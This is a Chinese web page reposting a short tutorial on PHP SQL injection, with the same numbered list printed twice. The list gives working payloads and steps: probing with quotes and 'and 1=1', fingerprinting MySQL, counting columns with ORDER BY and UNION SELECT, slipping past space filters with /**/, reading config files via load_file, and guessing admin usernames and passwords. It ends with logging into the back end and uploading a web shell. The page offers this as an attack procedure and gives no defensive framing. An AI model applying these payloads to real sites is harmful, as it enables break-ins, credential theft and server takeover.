您现在的位置是:网站首页> 编程资料编程资料
php注入基本步骤小结_脚本攻防_网络安全_
2023-05-24
488人已围观
简介 php注入基本步骤小结_脚本攻防_网络安全_
php注入十点基本步骤
1、判断是否存在注入,加'、and 1=1、and 1=2
2、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询
3、利用order by 暴字段,在网址后加 order by 10/* 如果返回正常说明字段大于10
4、再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常报出数字,说明猜到准确字段数。如过滤了空格可以用/**/代替。
(可在分别用user()、database()、version()进行替换报出的数字进而查看信息)
5、判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0/* 如果结果返回错误,那我们只能猜解管理员帐号和密码了。
6、如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。
7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,说明存在这个表。
8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按报出的数字进行替换
9、同理再猜解password字段,猜解成功再找后台登录。
10、登录后台,上传shell。
11、检测是不是root权限 and/**/ord(mid(user(),1,1))=114/*
1、判断是否存在注入,加'、and 1=1、and 1=2
2、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询
3、利用order by 暴字段,在网址后加 order by 10/* 如果返回正常说明字段大于10
4、再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常报出数字,说明猜到准确字段数。如过滤了空格可以用/**/代替。
(可在分别用user()、database()、version()进行替换报出的数字进而查看信息)
5、判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0/* 如果结果返回错误,那我们只能猜解管理员帐号和密码了。
6、如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。
7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,说明存在这个表。
8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按报出的数字进行替换
9、同理再猜解password字段,猜解成功再找后台登录。
10、登录后台,上传shell。
11、检测是不是root权限 and/**/ord(mid(user(),1,1))=114/*
相关内容
- Z-blog后台拿SHELL方法总结_脚本攻防_网络安全_
- Ecshop后台拿shell方法总结_脚本攻防_网络安全_
- MSSQL中两种特别的执行命令的方法_脚本攻防_网络安全_
- webshell提权经验分享_脚本攻防_网络安全_
- 利用星外虚拟机的入侵 经验分析_脚本攻防_网络安全_
- 反常规and 1=1的or 1=2注入技巧_脚本攻防_网络安全_
- mysql的user.MYD数据库连接密码hash值无法用winhex打开等_脚本攻防_网络安全_
- 入侵中国红客联盟过程分析_脚本攻防_网络安全_
- 后台登入框注入拿shell步骤_脚本攻防_网络安全_
- 使用参数化查询防止SQL注入漏洞_脚本攻防_网络安全_